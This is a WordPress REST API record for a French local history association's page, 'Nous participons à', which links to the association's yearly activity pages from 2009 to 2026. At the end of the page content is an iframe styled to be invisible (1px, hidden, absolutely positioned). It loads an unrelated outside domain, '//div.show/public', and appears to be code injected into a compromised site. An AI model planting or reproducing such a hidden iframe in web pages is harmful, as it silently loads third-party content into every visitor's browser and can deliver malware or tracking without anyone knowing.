{"id":171,"date":"2017-05-24T19:03:45","date_gmt":"2017-05-24T17:03:45","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=171"},"modified":"2026-04-14T09:47:32","modified_gmt":"2026-04-14T07:47:32","slug":"nous-participons-a","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=171","title":{"rendered":"Nous participons \u00e0"},"content":{"rendered":"<h2>Cette ann\u00e9e<\/h2>\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=8918\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2026<\/span><\/a><\/span>\n\n<h2>Les ann\u00e9es pass\u00e9es<\/h2>\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=8647\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2025<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7846\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2024<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=7005\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2023<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6222\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2022<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=5871\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2021<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=5282\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2020<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=4390\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2019<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=3008\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2018<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=593\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2017<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=1767\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2016<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=1826\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2015<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=1965\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2014<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=2018\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2013<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=2228\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2012<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=2231\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2011<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=2230\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2010<\/span><\/a><\/span>\n\n<span class=\"btImage1\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=2229\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/plugins\/bt-annee\/images\/bt_annee.png\" class=\"btImage2\"><span class=\"btImage3\">2009<\/span><\/a><\/span>\n\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Cette ann\u00e9e Les ann\u00e9es pass\u00e9es<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":6,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-171","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=171"}],"version-history":[{"count":10,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/171\/revisions"}],"predecessor-version":[{"id":8920,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/171\/revisions\/8920"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}